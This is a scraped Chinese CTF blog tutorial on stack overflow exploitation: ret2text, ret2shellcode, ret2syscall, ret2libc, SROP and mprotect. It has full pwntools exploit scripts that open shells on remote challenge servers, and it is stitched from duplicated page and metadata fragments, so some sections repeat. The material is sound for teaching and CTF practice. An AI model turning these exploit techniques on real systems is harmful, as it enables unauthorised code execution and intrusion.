(&quot;LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc&quot;...) RSI: 0x7ffffffee198 --&gt; 0x7ffffffee3cf (&quot;/mnt/e/wsl/ciscn_2019_n_5&quot;) RDI: 0x1 RBP: 0x7ffffffee0b0 --&gt; 0x4006b0 --&gt; 0x41ff894156415741 RSP: 0x7ffffffee090 --&gt; 0x4006b0 --&gt; 0x41ff894156415741 RIP: 0x40063e --&gt; 0xb900200a1b058b48 R8 : 0x7fffff3ecd80 --&gt; 0x0 R9 : 0x7fffff3ecd80 --&gt; 0x0 R10: 0x3 R11: 0x7fffff021ab0 (&lt;__libc_start_main&gt;: push r13) R12: 0x400540 --&gt; 0x89485ed18949ed31 R13: 0x7ffffffee190 --&gt; 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x400636 &lt;main&gt;: push rbp 0x400637 &lt;main+1&gt;: mov rbp,rsp 0x40063a &lt;main+4&gt;: sub rsp,0x20=&gt; 0x40063e &lt;main+8&gt;: mov rax,QWORD PTR [rip+0x200a1b] # 0x601060 &lt;stdout@@GLIBC_2.2.5&gt; 0x400645 &lt;main+15&gt;: mov ecx,0x0 0x40064a &lt;main+20&gt;: mov edx,0x2 0x40064f &lt;main+25&gt;: mov esi,0x0 0x400654 &lt;main+30&gt;: mov rdi,rax [------------------------------------stack-------------------------------------] 0000| 0x7ffffffee090 --&gt; 0x4006b0 --&gt; 0x41ff894156415741 0008| 0x7ffffffee098 --&gt; 0x400540 --&gt; 0x89485ed18949ed31 0016| 0x7ffffffee0a0 --&gt; 0x7ffffffee190 --&gt; 0x1 0024| 0x7ffffffee0a8 --&gt; 0x0 0032| 0x7ffffffee0b0 --&gt; 0x4006b0 --&gt; 0x41ff894156415741 0040| 0x7ffffffee0b8 --&gt; 0x7fffff021b97 (&lt;__libc_start_main+231&gt;: mov edi,eax) 0048| 0x7ffffffee0c0 --&gt; 0x1 0056| 0x7ffffffee0c8 --&gt; 0x7ffffffee198 --&gt; 0x7ffffffee3cf (&quot;/mnt/e/wsl/ciscn_2019_n_5&quot;) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, main () at pwn.c:7 gdb-peda$ vmmap 发现bss段： 0x00601000 0x00602000 rwxp /mnt/e/wsl/ciscn_2019_n_5 所以我们直接将shellcode写入bss段然后执行。 #!/usr/bin/env python from pwn import * context(arch=&#39;amd64&#39;,os=&#39;linux&#39;,log_level=&#39;debug&#39;) #注意要设置context io = remote(&#39;node3.buuoj.cn&#39;,26176) bss = 0x601080 io.recvuntil(&#39;name\n&#39;) shellcode = asm(shellcraft.sh()) io.send(shellcode) io.recvuntil(&#39;?\n&#39;) payload = &#39;a&#39;*0x20 + &#39;a&#39;*0x8 + p64(bss) io.sendline(payload) io.interactive() ret2syscall——质的提升 x86的execve函数系统调用号为0xb，x64平台的execve系统调用号为0x3b。用ax寄存器存储系统调用号。相当于传递了一个参数。 StackOverflow_ret2syscall_x64 __int64 sub_400B60() { char buf; // [rsp+0h] [rbp-400h] sub_410390((__int64)&quot;Any last words?&quot;); sub_4498A0(0, &amp;buf, 0x7D0uLL); return sub_40F710((unsigned __int64)&quot;This will be the last thing that you say: %s\n&quot;); } surager@KaliWindows:~/wsl$ ROPgadget --binary ./ret2syscall_x64 --only &quot;syscall&quot; Gadgets information ============================================================ 0x000000000040129c : syscall Unique gadgets found: 1 找到了syscall，可以把/bin/sh读入bss段，然后传给execve，构造execve(“/bin/sh”,0,0);便可以得到shell。 需要注意，构造payload时，当要跳转到一个函数执行时，紧跟着的一个参数是这个函数的返回地址，例如： padding+p64(read_add)+p64(return_add)+p64(0)+p64(bss_add)+p64(0x100) 这个payload会先覆盖返回地址为read的地址，然后将p64(return_add)后面的三个作为参数。read执行完毕之后回到return_add这个地址 exp： #!/usr/bin/env python from pwn import * context.log_level = &#39;debug&#39; io = remote(&#39;118.190.133.9&#39;,20004) elf = ELF(&#39;./ret2syscall_x64&#39;) #可以自动获取文件中的某些地址 pop_rax_add = 0x0000000000415664 pop_rdi_add = 0x0000000000400686 pop_rsi_add = 0x00000000004101f3 pop_rdx_add = 0x00000000004498b5 #这四个地址通过ROPgadget找到 main_add = 0x400B60 read_add = 0x4498AA bss_add = elf.bss() #得到bss的地址 syscall = 0x000000000040129c padding = &#39;a&#39;*0x400 + &#39;a&#39;*0x8 payload1 = padding + p64(pop_rdi_add) + p64(0x0) + p64(pop_rsi_add) + p64(bss_add) + p64(pop_rdx_add) + p64(0x100) + p64(read_add) + p64(main_add) io.recvuntil(&#39;Any last words?\n&#39;) io.sendline(payload1) io.send(&#39;/bin/sh\x00&#39;) payload2 = padding + p64(pop_rdi_add) + p64(bss_add) + p64(pop_rsi_add) + p64(0x0) + p64(pop_rdx_add) + p64(0x0) + p64(pop_rax_add) + p64(0x3b) +p64(syscall) io.recvuntil(&#39;Any last words?\n&#39;) io.sendline(payload2) io.interactive() payload1相当于下面的代码： mov rdi,0 mov rsi,offset bss mov rdx,100h call _read ;构造read(0,&amp;bss,0x100) jmp main ;回到main，准备构造第二次rop 执行完payload1之后回到main函数 payload2相当于下面的代码： mov rdi,offset bss mov rsi,0 mov rdx,0 mov rax,3bh syscall ;因为rax为3b，所以执行execve(&quot;/bin/sh&quot;,0,0) 成功拿到shell $ ls $ cat flag [DEBUG] Sent 0x9 bytes: &#39;cat flag\n&#39; [DEBUG] Received 0x19 bytes: &#39;flag{*******************}&#39; ret2libc——彻底挣脱束缚 StackOverflow_ret2libc 保护机制： $ checksec stackoverflow_ret2libc Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 之后分析程序就懵逼了： int __cdecl main(int argc, const char **argv, const char **envp) { setvbuf(stdin, 0LL, 2, 0LL); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stderr, 0LL, 2, 0LL); puts(&quot;Please input your ID:&quot;); get_id(); puts(&quot;Done&quot;); return 0; } ssize_t get_id() { char buf; // [rsp+0h] [rbp-20h] return read(0, &amp;buf, 0x50uLL); } 只有这两个能用的，没有/bin/sh，没有system，这时候就需要去libc.so里面找外部函数执行了。 libc.so里面集成了大量的系统级函数，其中就包括system，还包括字符串”/bin/sh”。由于动态链接时共享文件的最终装载地址在编译时是不确定的，所以我们需要泄露出libc的基址从而获取装载的偏移量（确定的）。 利用思路：通过输出函数将got表中的某个函数的地址泄露出来，然后减去libc中对应函数的地址就得到了偏移量，然后再用偏移量加上其他函数在libc中的地址，就得到了其他函数。 exp： #!/usr/bin/env python from pwn import * # context.log_level = &#39;debug&#39; io=remote(&#39;118.190.133.9&#39;,10003 )elf=ELF(&#39;./StackOverflow_ret2libc&#39;) puts_plt=elf.plt[&#39;puts&#39;] puts_got=elf.got[&#39;puts&#39;] main_add=elf.symbols[&#39;main&#39;] padding = &#39;a&#39;*0x20+&#39;a&#39;*0x8 rdi = 0x0000000000400783 payload1 = padding + p64(rdi) + p64(puts_got) +p64(puts_plt) + p64(main_add) io.recvuntil(&quot;Please input your ID:\n&quot;) io.sendline(payload1) leak = u64(io.recv()[0:8]+&#39;\x00\x00&#39;) libc = ELF(&#39;./x64-libc-2.23.so&#39;) offset = leak - libc.symbols[&#39;puts&#39;] sys_add = offset + libc.symbols[&#39;system&#39;] binsh_add = offset + libc.search(&#39;/bin/sh&#39;).next() payload2 = padding + p64(rdi)+ p64(binsh_add) + p64(sys_add) io.recvuntil(&quot;Please input your ID:\n&quot;) io.sendline(payload2) io.interactive() 第一个payload将got表中的puts地址泄露出来，用这个地址减去libc中的puts地址即得到offset。 再用offset加上其他函数的地址就可以得到其他函数的使用权了。 如果没有libc的话可以pip install一个LibcSearcher库用。 https://github.com/lieanu/LibcSearcher 以下内容简略介绍。 SROP SROP(Sigreturn Oriented Programming)于2014年被Vrije Universiteit Amsterdam的Erik Bosman提出，其相关研究Framing Signals — A Return to Portable Shellcode发表在安全顶级会议Oakland 2014上，被评选为当年的Best Student Papers。 ciscn_2019_s_3 因为给了15h，可以直接SROP signed __int64 gadgets() { return 15LL; } 先泄露栈地址，然后用栈把/bin/sh读入execve： #!/usr/bin/env python from pwn import * context(arch=&#39;amd64&#39;,os=&#39;linux&#39;,log_level=&#39;debug&#39;) #io = process(&#39;./ciscn_s_3&#39;) io = remote(&#39;node3.buuoj.cn&#39;,25931) vuln_add = 0x4004ED syscall = 0x400517 gadget = 0x4004DA payload = &#39;/bin/sh\x00&#39;*2+p64(vuln_add)io.send(payload)io.recv(0x20) sh = u64(io.recv(8))-0x118 frame = SigreturnFrame() frame.rax = constants.SYS_execve frame.rdi = sh frame.rsi = 0x0 frame.rdx = 0x0 frame.rsp = sh frame.rip = syscall payload = &#39;/bin/sh\x00&#39;*2 + p64(gadget) + p64(syscall) + str(frame) io.sendline(payload) io.interactive() mprotect使用 int mprotect(const void *start, size_t len, int prot); 含义：从start开始长度为len的内存区的保护属性修改为prot指定的值，prot的值和linux的权限属性值相同。 get_started_3dsctf_2016 get_flag函数在远程根本不能用。 所以另辟蹊径，搜索mprotect函数，可以利用mprotect在bss上面写入可执行权限，之后用read函数在bss上写入shellcode。 payload： #!/usr/bin/env python from pwn import * context.log_level = &#39;debug&#39; io = remote(&#39;node3.buuoj.cn&#39;,28342) elf = ELF(&#39;./get_started_3dsctf_2016&#39;) pop_3_add = 0x0809e4c5 rw_add = 0x080eb000 payload = &#39;a&#39;*0x38 + p32(elf.symbols[&#39;mprotect&#39;]) + p32(pop_3_add) + p32(rw_add) + p32(0x1000) + p32(0x7) + p32(elf.symbols[&#39;read&#39;]) + p32(pop_3_add) + p32(0x0) + p32(0x080ebf80) +p32(0x200) + p32(0x080ebf80) io.sendline(payload) io.sendline(asm(shellcraft.sh(),arch=&#39;i386&#39;,os=&#39;linux&#39;)) io.interactive() 放下狠话：可能还会更。 有了！有了！2020-05-09有后续了！ROP tricks 0xdeadbeef参考文章 [漏洞分析] 栈基础 &amp; 栈溢出 &amp; 栈溢出进阶 https://www.52pojie.cn/thread-974510-1-1.html 栈溢出从入门到入狱 https://aidaip.github.io/binary/2019/03/16/%E6%A0%88%E6%BA%A2%E5%87%BA%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%85%A5%E7%8B%B1.html 栈溢出原理 https://wiki.x10sec.org/pwn/stackoverflow/stackoverflow_basic/ 基本 ROP https://wiki.x10sec.org/pwn/stackoverflow/basic_rop/ 高级ROP https://wiki.x10sec.org/pwn/stackoverflow/advanced_rop/ checksec及其包含的保护机制 https://www.jianshu.com/p/8a9ef7205632" /><link rel="canonical" href="https://surager.pub/_posts/2020-02-18-%E6%A0%88%E6%BA%A2%E5%87%BA-%E9%9D%B6%E5%90%91%E6%89%93%E5%87%BB/" /><meta property="og:url" content="https://surager.pub/_posts/2020-02-18-%E6%A0%88%E6%BA%A2%E5%87%BA-%E9%9D%B6%E5%90%91%E6%89%93%E5%87%BB/" /><meta property="og:site_name" content="Surager" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-02-18T00:00:00+08:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="栈溢出：靶向打击" /><meta name="google-site-verification" content="YIKi1rBnyUaS-DMYiluseI5kZzTwjCkTFmKkSkMZDJk" /><meta name="baidu-site-verification" content="szbTSfUGAB" /> <script type="application/ld+json"> {"url":"https://surager.pub/_posts/2020-02-18-%E6%A0%88%E6%BA%A2%E5%87%BA-%E9%9D%B6%E5%90%91%E6%89%93%E5%87%BB/","headline":"栈溢出：靶向打击","datePublished":"2020-02-18T00:00:00+08:00","dateModified":"2020-02-18T00:00:00+08:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://surager.pub/_posts/2020-02-18-%E6%A0%88%E6%BA%A2%E5%87%BA-%E9%9D%B6%E5%90%91%E6%89%93%E5%87%BB/"},"description":"栈溢出 0x0栈基础 堆栈(stack)是一种数据结构。堆栈都是一种数据项按序排列的数据结构，只能在一端(称为栈顶(top))对数据项进行插入和删除。 堆栈对于面向过程的编程语言来说是非常重要的。函数调用经常嵌套，在同一时刻，堆栈中会有多个函数的信息。每个未完成运行的函数占用一个独立的连续区域，称作栈帧。可以说，没有栈就没有函数。 需要注意的是 其操作主要有压栈(push)与出栈(pop)、调用(call)、离开(leave)与返回(ret)等操作。 程序的栈是从进程地址空间的高地址向低地址增长的，数据是从低地址向高地址存放的 。 基本操作： 开栈的基本操作如下： push ebp ;保存旧栈帧的底部,在func执行完成后在pop ebp mov ebp,esp ;设置新栈帧的底部 sub esp,xxx ;设置新栈帧的顶部 . . . 参数入栈时，将参数从右向左依次压入系统栈，然后将当前代码段call指令的下一条指令的地址填入返回地址处，然后去执行call的代码。然后保存ebp，开栈。若函数有返回值，则一般将返回值存入eax，然后leave，ret。这就是函数调用(call)的全过程。 传参 需要注意的是，调用一个函数的时候，需要传参。x86和x64的传参方式有所不同。具体如下: x86: 例如要调用一个read函数，原型为： read(0,&amp;buf,0x100); 那么我们只需要将参数传入栈中，x86平台通过栈传递参数： push 100h ;nbytes push eax ;buf push 0 ;fd call _read x64: x64平台通过寄存器和栈传参，前六个参数分别存入rdi,rsi,rdx,rcx,r8,r9，再多就存入栈中。 mov rdx,100h ;nbytes lea rsi,s1 ;buf mov rdi,0 ;fd call _read 在进行栈溢出时，我们要寻找pop rdi;ret这样的片段进行传参，用到一种叫rop的技术。这里介绍一下一个寻找rop的指令： ROPgadget --binary ./filename --only &quot;pop|ret&quot; ROP(Return Oriented Programming)，其主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段( gadgets )来改变某些寄存器或者变量的值，从而控制程序的执行流程。所谓gadgets 就是以 ret 结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程。 0x10栈溢出 栈溢出指的是程序向栈中某个变量写入的字节数超过了这个变量本身申请的字节数，因而导致栈中与之相邻的变量的值被改变。 栈溢出达到的目的 破坏程序内存结构 执行system(/bin/sh) 执行shellcode 栈溢出思路 找到危险函数： 系统级函数：system、execve 输入函数：read、scanf、gets、vscanf 输出函数(泄露地址)：sprintf、puts、printf 判断填充的padding 1. 计算我们所要操作的地址和所要覆盖的地址的距离 2. IDA静态分析中常见的三种索引方式 a. 相对于栈基地址的索引,通过查看EBP相对偏移获得 char name[32]; [esp+0h] [ebp-28h] ==&gt; 0x28+0x4 b. 相对于栈顶指针的索引,需要加上ESP到EBP的偏移，然后转换为a方式 c. 直接地址索引,相当于直接给出了地址 覆盖内容 1. 覆盖返回地址 2. 覆盖某个变量的值。 利用成功 打开交互，然后cat flag吧。 0x20基本工具 file工具 没啥好说的，主要是看这个文件的属性的，重点关注位数和链接方式（详情请见静态链接,动态链接）： babyrop2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.32, BuildID[sha1]=fab931b976ae2ff40aa1f5d1926518a0a31a8fd7, not stripped 如上，ELF——ELF文件，64-bit——64位，dynamically linked——动态链接。 checksec工具 [*] &#39;/mnt/e/wsl/babyrop2&#39; Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) arch：程序位数 RELRO：设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号，从而减少对GOT（Global Offset Table）攻击。RELRO为” Partial RELRO”，说明我们对GOT表具有写权限。 Stack：开启则无法直接覆盖EIP让程序任意跳转，跳转后会进行cookie校验；但这项保护可以被绕过 NX：NX即No-eXecute（不可执行）的意思，NX（DEP）的基本原理是将数据所在内存页标识为不可执行，当程序溢出成功转入shellcode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是去执行恶意指令。 PIE：开启在每次程序运行地址都会变化，未开启则返回值括号内是程序的基址（见surager博文《动态链接》） pwntools # Pwntools环境预设 from pwn import * context.arch = &quot;amd64/i386&quot; #指定系统架构 context.terminal = [&quot;tmux,&quot;splitw&quot;,&quot;-h&quot;] #指定分屏终端 context.os = &quot;linux&quot; #context用于预设环境 # 库信息 elf = ELF(&#39;./PWNME&#39;) # ELF载入当前程序的ELF，以获取符号表，代码段，段地址，plt，got信息 libc = ELF(&#39;lib/i386-linux-gnu/libc-2.23.so&#39;) # 载入libc的库，可以通过vmmap查看 /* 首先使用ELF()获取文件的句柄，然后使用这个句柄调用函数,如 &gt;&gt;&gt; e = ELF(&#39;/bin/cat&#39;) &gt;&gt;&gt; print hex(e.address) # 文件装载的基地址 &gt;&gt;&gt; print hex(e.symbols[&#39;write&#39;]) # plt中write函数地址 &gt;&gt;&gt; print hex(e.got[&#39;write&#39;]) # GOT表中write符号的地址 &gt;&gt;&gt; print hex(e.plt[&#39;write&#39;]) # PLT表中write符号的地址 */ # Pwntools通信 p = process(&#39;./pwnme&#39;) # 本地 process与程序交互 r = remote(&#39;exploitme.example.com&#39;,3333) # 远程 # 交互 recv() # 接收数据,一直接收 recv(numb=4096,timeout=default) # 指定接收字节数与超时时间 recvuntil(&quot;111&quot;) # 接收到111结束，可以裁剪，如.[1:4] recbline() # 接收到换行结束 recvline(n) # 接收到n个换行结束 recvall() # 接收到EOF recvrepeat(timeout=default) #接收到EOF或timeout send(data) # 发送数据 sendline(data) # 发送一行数据，在末尾会加\\n sendlineafter(delims,data) # 在程序接收到delims再发送data r.send(asm(shellcraft.sh())) # 信息通信交互 r.interactive() # send payload后接收当前的shell # 字符串与地址的转换 p64(),p32() #将字符串转化为ascii字节流 u64(),u32() #将ascii的字节流解包为字符串地址 IDA 自己看书 0x30调试（实例分析） nc——签到 nc是netcat的简写，有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用，被设计为一个简单、可靠的网络工具。 一般其程序为： int main() { system(&quot;/bin/sh&quot;); return 0; } system是执行系统指令，/bin/sh在自己电脑里输入一下就知道是啥了。 相似的函数还有execve(“/bin/sh”,0,0); 实战: surager@KaliWindows:~/wsl$ nc node3.buuoj.cn 27422 cat flag flag{0a7da57a-a356-4745-96a6-87bfc4b5b86c} ret2text——梦开始的地方 通过构造payload=padding+address_system(‘/bin/sh’)来完成漏洞利用 jarvisoj_level0 保护机制： $ checksec level0 Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 程序只开启了NX保护。 int callsystem() { return system(&quot;/bin/sh&quot;); } ssize_t vulnerable_function() { char buf; // [rsp+0h] [rbp-80h] return read(0, &amp;buf, 0x200uLL); } int __cdecl main(int argc, const char **argv, const char **envp) { write(1, &quot;Hello, World\\n&quot;, 0xDuLL); return vulnerable_function(); } 栈相对于rbp的距离为0x80，而read读入了0x200个字符，存在栈溢出。 padding = ‘a’*0x80+’a’*0x8 然后找到callsystem的地址，填入padding之后： #!/usr/bin/env python from pwn import * context.log_level = &#39;debug&#39; io=remote(&#39;node3.buuoj.cn&#39;,25555) payload=&#39;a&#39;*128+&#39;aaaaaaaa&#39;+p64(0x40059a) io.sendline(payload) io.interactive() surager@KaliWindows:~/wsl$ ./level0.py [+] Opening connection to node3.buuoj.cn on port 29296: Done [*] Switching to interactive mode Hello, World $ cat flag flag{************************************} ciscn_2019_n_1 保护机制： $ checksec ciscn_2019_n_1 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 程序开启了NX保护。 int func() { int result; // eax __int64 v1; // [rsp+0h] [rbp-30h] float v2; // [rsp+2Ch] [rbp-4h] v2 = 0.0; puts(&quot;Let&#39;s guess the number.&quot;); gets(&amp;v1); if ( v2 == 11.28125 ) result = system(&quot;cat /flag&quot;); else result = puts(&quot;Its value should be 11.28125&quot;); return result; } gets并没有限制读入字符的个数，因此可以覆盖返回地址进行跳转，查看汇编得到system(“cat /flag”);地址 exp: from pwn import * io=remote(&#39;node3.buuoj.cn&#39;,29966) payload=&#39;a&#39;*0x30+&#39;a&#39;*8+p64(0x4006be) io.sendline(payload) io.interactive() ret2shellcode——巧取 ciscn_2019_n_5 保护机制： $ checksec ciscn_2019_n_5 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 可以看出，几乎没有开任何保护，而且有可读可写可执行的段。我们可以向RWX段读入shellcode，从而获取shell。 int __cdecl main(int argc, const char **argv, const char **envp) { char text[30]; // [rsp+0h] [rbp-20h] setvbuf(stdout, 0LL, 2, 0LL); puts(&quot;tell me your name&quot;); read(0, name, 0x64uLL); puts(&quot;wow~ nice name!&quot;); puts(&quot;What do you want to say to me?&quot;); gets((__int64)text, (__int64)name); return 0; } 查看变量name，发现在bss段 .bss:0000000000601080 ; char name[100] .bss:0000000000601080 name db 64h dup(?) ; DATA XREF: main+35↑o 我们用gdb在main处下断点，用vmmap查看信息： gdb-peda$ b main Breakpoint 1 at 0x40063e gdb-peda$ r [----------------------------------registers-----------------------------------] RAX: 0x400636 --&gt; 0x20ec8348e5894855 RBX: 0x0 RCX: 0x4006b0 --&gt; 0x41ff894156415741 RDX: 0x7ffffffee1a8 --&gt; 0x7ffffffee3e9 (&quot;LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc&quot;...) RSI: 0x7ffffffee198 --&gt; 0x7ffffffee3cf (&quot;/mnt/e/wsl/ciscn_2019_n_5&quot;) RDI: 0x1 RBP: 0x7ffffffee0b0 --&gt; 0x4006b0 --&gt; 0x41ff894156415741 RSP: 0x7ffffffee090 --&gt; 0x4006b0 --&gt; 0x41ff894156415741 RIP: 0x40063e --&gt; 0xb900200a1b058b48 R8 : 0x7fffff3ecd80 --&gt; 0x0 R9 : 0x7fffff3ecd80 --&gt; 0x0 R10: 0x3 R11: 0x7fffff021ab0 (&lt;__libc_start_main&gt;: push r13) R12: 0x400540 --&gt; 0x89485ed18949ed31 R13: 0x7ffffffee190 --&gt; 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x400636 &lt;main&gt;: push rbp 0x400637 &lt;main+1&gt;: mov rbp,rsp 0x40063a &lt;main+4&gt;: sub rsp,0x20=&gt; 0x40063e &lt;main+8&gt;: mov rax,QWORD PTR [rip+0x200a1b] # 0x601060 &lt;stdout@@GLIBC_2.2.5&gt; 0x400645 &lt;main+15&gt;: mov ecx,0x0 0x40064a &lt;main+20&gt;: mov edx,0x2 0x40064f &lt;main+25&gt;: mov esi,0x0 0x400654 &lt;main+30&gt;: mov rdi,rax [------------------------------------stack-------------------------------------] 0000| 0x7ffffffee090 --&gt; 0x4006b0 --&gt; 0x41ff894156415741 0008| 0x7ffffffee098 --&gt; 0x400540 --&gt; 0x89485ed18949ed31 0016| 0x7ffffffee0a0 --&gt; 0x7ffffffee190 --&gt; 0x1 0024| 0x7ffffffee0a8 --&gt; 0x0 0032| 0x7ffffffee0b0 --&gt; 0x4006b0 --&gt; 0x41ff894156415741 0040| 0x7ffffffee0b8 --&gt; 0x7fffff021b97 (&lt;__libc_start_main+231&gt;: mov edi,eax) 0048| 0x7ffffffee0c0 --&gt; 0x1 0056| 0x7ffffffee0c8 --&gt; 0x7ffffffee198 --&gt; 0x7ffffffee3cf (&quot;/mnt/e/wsl/ciscn_2019_n_5&quot;) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, main () at pwn.c:7 gdb-peda$ vmmap 发现bss段： 0x00601000 0x00602000 rwxp /mnt/e/wsl/ciscn_2019_n_5 所以我们直接将shellcode写入bss段然后执行。 #!/usr/bin/env python from pwn import * context(arch=&#39;amd64&#39;,os=&#39;linux&#39;,log_level=&#39;debug&#39;) #注意要设置context io = remote(&#39;node3.buuoj.cn&#39;,26176) bss = 0x601080 io.recvuntil(&#39;name\\n&#39;) shellcode = asm(shellcraft.sh()) io.send(shellcode) io.recvuntil(&#39;?\\n&#39;) payload = &#39;a&#39;*0x20 + &#39;a&#39;*0x8 + p64(bss) io.sendline(payload) io.interactive() ret2syscall——质的提升 x86的execve函数系统调用号为0xb，x64平台的execve系统调用号为0x3b。用ax寄存器存储系统调用号。相当于传递了一个参数。 StackOverflow_ret2syscall_x64 __int64 sub_400B60() { char buf; // [rsp+0h] [rbp-400h] sub_410390((__int64)&quot;Any last words?&quot;); sub_4498A0(0, &amp;buf, 0x7D0uLL); return sub_40F710((unsigned __int64)&quot;This will be the last thing that you say: %s\\n&quot;); } surager@KaliWindows:~/wsl$ ROPgadget --binary ./ret2syscall_x64 --only &quot;syscall&quot; Gadgets information ============================================================ 0x000000000040129c : syscall Unique gadgets found: 1 找到了syscall，可以把/bin/sh读入bss段，然后传给execve，构造execve(“/bin/sh”,0,0);便可以得到shell。 需要注意，构造payload时，当要跳转到一个函数执行时，紧跟着的一个参数是这个函数的返回地址，例如： padding+p64(read_add)+p64(return_add)+p64(0)+p64(bss_add)+p64(0x100) 这个payload会先覆盖返回地址为read的地址，然后将p64(return_add)后面的三个作为参数。read执行完毕之后回到return_add这个地址 exp： #!/usr/bin/env python from pwn import * context.log_level = &#39;debug&#39; io = remote(&#39;118.190.133.9&#39;,20004) elf = ELF(&#39;./ret2syscall_x64&#39;) #可以自动获取文件中的某些地址 pop_rax_add = 0x0000000000415664 pop_rdi_add = 0x0000000000400686 pop_rsi_add = 0x00000000004101f3 pop_rdx_add = 0x00000000004498b5 #这四个地址通过ROPgadget找到 main_add = 0x400B60 read_add = 0x4498AA bss_add = elf.bss() #得到bss的地址 syscall = 0x000000000040129c padding = &#39;a&#39;*0x400 + &#39;a&#39;*0x8 payload1 = padding + p64(pop_rdi_add) + p64(0x0) + p64(pop_rsi_add) + p64(bss_add) + p64(pop_rdx_add) + p64(0x100) + p64(read_add) + p64(main_add) io.recvuntil(&#39;Any last words?\\n&#39;) io.sendline(payload1) io.send(&#39;/bin/sh\\x00&#39;) payload2 = padding + p64(pop_rdi_add) + p64(bss_add) + p64(pop_rsi_add) + p64(0x0) + p64(pop_rdx_add) + p64(0x0) + p64(pop_rax_add) + p64(0x3b) +p64(syscall) io.recvuntil(&#39;Any last words?\\n&#39;) io.sendline(payload2) io.interactive() payload1相当于下面的代码： mov rdi,0 mov rsi,offset bss mov rdx,100h call _read ;构造read(0,&amp;bss,0x100) jmp main ;回到main，准备构造第二次rop 执行完payload1之后回到main函数 payload2相当于下面的代码： mov rdi,offset bss mov rsi,0 mov rdx,0 mov rax,3bh syscall ;因为rax为3b，所以执行execve(&quot;/bin/sh&quot;,0,0) 成功拿到shell $ ls $ cat flag [DEBUG] Sent 0x9 bytes: &#39;cat flag\\n&#39; [DEBUG] Received 0x19 bytes: &#39;flag{*******************}&#39; ret2libc——彻底挣脱束缚 StackOverflow_ret2libc 保护机制： $ checksec stackoverflow_ret2libc Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 之后分析程序就懵逼了： int __cdecl main(int argc, const char **argv, const char **envp) { setvbuf(stdin, 0LL, 2, 0LL); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stderr, 0LL, 2, 0LL); puts(&quot;Please input your ID:&quot;); get_id(); puts(&quot;Done&quot;); return 0; } ssize_t get_id() { char buf; // [rsp+0h] [rbp-20h] return read(0, &amp;buf, 0x50uLL); } 只有这两个能用的，没有/bin/sh，没有system，这时候就需要去libc.so里面找外部函数执行了。 libc.so里面集成了大量的系统级函数，其中就包括system，还包括字符串”/bin/sh”。由于动态链接时共享文件的最终装载地址在编译时是不确定的，所以我们需要泄露出libc的基址从而获取装载的偏移量（确定的）。 利用思路：通过输出函数将got表中的某个函数的地址泄露出来，然后减去libc中对应函数的地址就得到了偏移量，然后再用偏移量加上其他函数在libc中的地址，就得到了其他函数。 exp： #!/usr/bin/env python from pwn import * # context.log_level = &#39;debug&#39; io=remote(&#39;118.190.133.9&#39;,10003 )elf=ELF(&#39;./StackOverflow_ret2libc&#39;) puts_plt=elf.plt[&#39;puts&#39;] puts_got=elf.got[&#39;puts&#39;] main_add=elf.symbols[&#39;main&#39;] padding = &#39;a&#39;*0x20+&#39;a&#39;*0x8 rdi = 0x0000000000400783 payload1 = padding + p64(rdi) + p64(puts_got) +p64(puts_plt) + p64(main_add) io.recvuntil(&quot;Please input your ID:\\n&quot;) io.sendline(payload1) leak = u64(io.recv()[0:8]+&#39;\\x00\\x00&#39;) libc = ELF(&#39;./x64-libc-2.23.so&#39;) offset = leak - libc.symbols[&#39;puts&#39;] sys_add = offset + libc.symbols[&#39;system&#39;] binsh_add = offset + libc.search(&#39;/bin/sh&#39;).next() payload2 = padding + p64(rdi)+ p64(binsh_add) + p64(sys_add) io.recvuntil(&quot;Please input your ID:\\n&quot;) io.sendline(payload2) io.interactive() 第一个payload将got表中的puts地址泄露出来，用这个地址减去libc中的puts地址即得到offset。 再用offset加上其他函数的地址就可以得到其他函数的使用权了。 如果没有libc的话可以pip install一个LibcSearcher库用。 https://github.com/lieanu/LibcSearcher 以下内容简略介绍。 SROP SROP(Sigreturn Oriented Programming)于2014年被Vrije Universiteit Amsterdam的Erik Bosman提出，其相关研究Framing Signals — A Return to Portable Shellcode发表在安全顶级会议Oakland 2014上，被评选为当年的Best Student Papers。 ciscn_2019_s_3 因为给了15h，可以直接SROP signed __int64 gadgets() { return 15LL; } 